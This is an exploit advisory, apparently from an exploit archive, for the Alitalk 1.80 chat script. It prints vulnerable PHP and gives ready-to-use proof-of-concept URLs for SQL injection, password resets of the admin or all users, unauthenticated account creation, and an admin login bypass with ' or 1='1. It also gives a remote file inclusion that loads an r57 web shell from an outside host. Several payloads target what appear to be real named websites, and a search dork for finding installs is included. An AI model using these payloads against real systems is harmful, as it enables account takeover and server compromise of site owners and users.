Alitalk 1.80 SQL Injection / Bypass

`| # Title : alitalk v.1.80 Multiple Vulnerability   
| # Author : indoushka   
| # email : [email protected]   
| # Dork : POWERED BY ALITALK  
| # Tested on: windows 8.1 Français V.(Pro)   
| # Download : http://teh24h.ir/   
=======================================  
SQL INJECTION :  
  
you need to login in order to exploit this vulnerability  
vulnerable code on inc/receivertwo.php  
<?  
.....  
if($_GET['turnadd']==1)  
{  
$rmusr=0;  
$rmmzyiz=mysql_query("SELECT * from ".$alitalk_base['dbprefix']."users where room='".$_GET['mohit']."'");  
while ($rmuiz=mysql_fetch_array($rmmzyiz))  
{  
echo"<rmusj>";  
echo" r%dtr onmouseout=\"detailsclo()\" onmouseover=\"details(event,'".$rmuiz[gender]."','".$rmuiz[age]."','".$rmuiz[username]."','".$rmuiz[location]."')\" ondblclick=\"ums('".$rmuiz[uid]."','".$rmuiz[username]."','".""."')\" b*%d  
r%dtd width='19'b*%d r%dimg src=\"pix/room_user.gif\"b*%dr%d/tdb*%d  
r%dtd class='roomuser'b*%dr%dfont unselectable='on' style=\"cursor: default;\"b*%d $rmuiz[username] r%d/tdb*%d  
r%d/trb*%d";  
$rmusr++;  
echo"</rmusj>";  
}  
....  
?>  
  
poc:  
  
http://target/path/alitalk/inc/receivertwo.php?uid=1&mohit=y'+union+select+user(),2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2+from+alitalk_users+where+uid='1&turnadd=1&melody=0&lilil=400  
  
PASSWORD CHANGE BYPASS :  
  
vulnerable code on functionz/usercp.php  
<?  
.....  
function newpass($db,$id)  
{  
$nat=md5($_GET['old'].$_GET['old']);  
$nao=md5($_GET['new'].$_GET['new']);  
$threeyiz=mysql_query("SELECT * from ".$db."users where uid='".$id."' and password='".md5(md5($_GET['old']).$nat)."'");  
$yiz=mysql_fetch_array($threeyiz);  
if(!$yiz)  
{  
echo "Old Password is Wrong!";  
}  
else  
{  
mysql_query("UPDATE ".$db."users SET password='".md5(md5($_GET['new']).$nao)."' WHERE uid='".$id."'");  
mysql_query("UPDATE ".$db."users SET salt='".$nao."' WHERE uid='".$id."'");  
mpl($db,$id);  
}  
}  
.....  
?>  
  
pocs:  
  
http://target/path/inc/usercp.php?action=newpass&id=1' or password='&lilil=400&new=algeria  
this will change password to "algeria" for user with uid = 1 (admin).  
  
http://target/path/inc/usercp.php?action=newpass&id=1' or 1='1&lilil=400&new=algeria  
this will change ALL passwords to "algeria".  
http://www.taoa-tanzania.com/chat/alitalk/inc/elementz.php?lilil=400&ubild=indoushka&pa=algeria  
  
USER REGISTRATION BYPASS :  
  
vulnerable code on inc/elementz.php:  
  
<?  
......  
if($_GET['lilil']!=="".$_SESSION['lilol'].""){return false;}  
include"setting.php";  
$analuze=mysql_query("SELECT username from ".$alitalk_base['dbprefix']."users where username='".$_GET['ubild']."' and type='alitalk'");  
$analuzeed=mysql_fetch_array($analuze);  
if($analuzeed)  
{  
echo "Fatal Error";  
}  
else  
{  
$nat=md5($_GET['pa'].$_GET['pa']);  
$pass=md5(md5($_GET['pa']).$nat);  
mysql_query("INSERT into ".$alitalk_base['dbprefix']."users (firstname,lastname,gender,age,username,password,salt,joindate,addz,type) values('".$_GET['fn']."','".$_GET['ln']."','".$_GET['gender']."','".$_GET['age']."','".$_GET['ubild']."','".$pass."','".$nat."','".date("F j, Y")."','$uid','alitalk')");  
....  
?>  
  
poc:  
  
http://target/path/inc/elementz.php?lilil=400&ubild=algeria&pa=algeria  
this will add an account with username=algeria and password=algeria  
  
Access Bypass :  
  
code on admin/index.php  
<?  
.......  
else if($_POST['signin'])  
{  
include "../functionz/first_process.php";  
include "../inc/setting.php";  
addin($_POST['username'],$_POST['password'],$alitalk_base['dbprefix']);  
}  
.....  
?>  
  
vulnerable code on functionz/first_process.php  
<?  
......  
function addin($lamerz,$killer,$josh)  
{  
session_start();  
$nat=md5($killer.$killer);  
$analuze=mysql_query("SELECT * FROM ".$josh."info WHERE admin='".$lamerz."' AND password='".md5(md5($killer).$nat)."'");  
$analuzeed=mysql_fetch_array($analuze);  
if($analuzeed)  
{  
$_SESSION['adazsar']=1;  
?>  
  
admin login page= http://target/path/admin  
  
poc:  
ID = an_userID' or 1='1  
password = whatever  
  
L/R file inclusion :   
  
C:\web\www\alitalk\inc\elementd.php  
require_once('lang/'.$alitalk['lang'].'/menu.php');  
Line : 31  
Function : require_once  
Variables : $alitalk['lang']  
poc :  
  
http://www.nickerie.net/chat/inc/elementd.php?alitalk[lang]=http://www.dcvi.net/r57.txt  
  
Greetz :   
jericho http://attrition.org & http://www.osvdb.org/ * packetstormsecurity.com * http://is-sec.org/cc/  
Hussin-X * Stake (www.v4-team.com) * D4NB4R * ViRuS_Ra3cH * yasMouh * https://www.corelan.be * exploit4arab.net  
---------------------------------------------------------------------------------------------------------------  
`